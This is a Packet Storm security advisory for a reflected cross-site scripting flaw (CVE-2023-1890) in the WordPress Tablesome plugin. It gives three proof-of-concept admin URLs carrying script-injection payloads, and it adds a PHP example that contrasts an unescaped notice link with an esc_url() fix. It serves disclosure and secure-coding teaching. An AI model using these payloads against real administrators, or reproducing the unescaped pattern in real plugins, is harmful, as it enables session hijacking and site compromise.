Packet Storm, PACKETSTORM:173727, Taurus Omar
History: Jul 25, 2023 - 12:00 a.m.

WordPress Tablesome Cross Site Scripting

2023-07-25 00:00:00
Taurus Omar
packetstormsecurity.com
wordpress
tablesome
cross-site scripting
reflected
cve-2023-1890
xss
proof of concept
wpscan

EPSS

0.003

Percentile

70.9%

Title:  
WordPress Plugin Tablesome < 1.0.9 - Reflected XSS  
  
References:  
CVE-2023-1890  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not escape various generated URLs before outputting them in HTML attributes when certain admin notices are displayed, leading to reflected cross-site scripting.  
  
Affects Plugins:  
Tablesome - Fixed in version 1.0.9  
  
Proof of Concept:  
Make a logged-in admin open one of the URLs below while the feature/tracking notice has not yet been dismissed.  
  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script>  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script>   
  
Classification:  
Type: XSS  
OWASP top 10 A7: Cross-Site Scripting (XSS)  
CWE-79  
  
wpScan:  
https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d  
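As an added illustration of the pattern the description names (a generated URL placed unescaped into an attribute of an admin notice), the PHP below shows the vulnerable construction beside the esc_url() fix. It is constructed example code, not Tablesome's source: the notice markup, the parameter name feature_notice_dismissed and the marker payload are assumptions, and the stand-in functions are simplified approximations of the WordPress originals that are only defined when the script runs outside WordPress.

```php
<?php
// Constructed illustration of the bug class in the description above (a generated
// URL echoed into an attribute of an admin notice unescaped); NOT Tablesome's code.
// add_query_arg()/esc_url() are WordPress APIs; outside WordPress (plain `php`) the
// simplified stand-ins below are defined so the script runs on its own.
if ( ! function_exists( 'add_query_arg' ) ) {
	// Stand-in: like WordPress, defaults to $_SERVER['REQUEST_URI'] and, after
	// parse_str() has percent-decoded it, re-encodes values but not keys.
	function add_query_arg( $key, $value, $url = null ) {
		$url   = $url ?? ( $_SERVER['REQUEST_URI'] ?? '' );
		$parts = explode( '?', $url, 2 );
		parse_str( $parts[1] ?? '', $qs );
		$qs[ $key ] = $value;
		$pairs = array();
		foreach ( $qs as $k => $v ) {
			$pairs[] = ( '' === $v ) ? $k : $k . '=' . urlencode( $v );
		}
		return $parts[0] . '?' . implode( '&', $pairs );
	}
	// Stand-in for esc_url(): strip characters a URL may not contain (" < > among
	// them), then entity-encode for attribute context.
	function esc_url( $url ) {
		$url = preg_replace( '|[^a-z0-9-~+_.?#=!&;,/:%@$\|*\'()\[\]\\x80-\\xff]|i', '', $url );
		return htmlspecialchars( $url, ENT_QUOTES, 'UTF-8' );
	}
}
// Constructed request to the plugin's list screen. The extra parameter NAME carries
// a harmless percent-encoded marker (a"><b>marker</b>); keys come back out unencoded.
$_SERVER['REQUEST_URI'] = '/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%3Cb%3Emarker%3C%2Fb%3E';

// Vulnerable pattern: the dismiss link is built from the current URL and placed
// straight into href, so the marker's quote closes the attribute.
function render_notice_vulnerable() {
	$dismiss = add_query_arg( 'feature_notice_dismissed', '1' );
	return '<div class="notice"><a href="' . $dismiss . '">Dismiss</a></div>';
}
// Hardened pattern: esc_url() before output, so breakout characters never reach
// the attribute.
function render_notice_hardened() {
	$dismiss = esc_url( add_query_arg( 'feature_notice_dismissed', '1' ) );
	return '<div class="notice"><a href="' . $dismiss . '">Dismiss</a></div>';
}
// Review/unit-test check: the href value must contain no quote or angle bracket.
function notice_is_safe( $html ) {
	return 1 === preg_match( '#^<div class="notice"><a href="[^"<>]*">Dismiss</a></div>$#', $html );
}
foreach ( array( 'vulnerable' => render_notice_vulnerable(), 'hardened' => render_notice_hardened() ) as $label => $html ) {
	echo $label, ': ', $html, "\n  safe? ", notice_is_safe( $html ) ? 'yes' : 'no', "\n";
}
```

Run with `php example.php`: the vulnerable notice reports `safe? no` because the marker's `">` closes the href attribute, while the hardened notice reports `safe? yes`.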
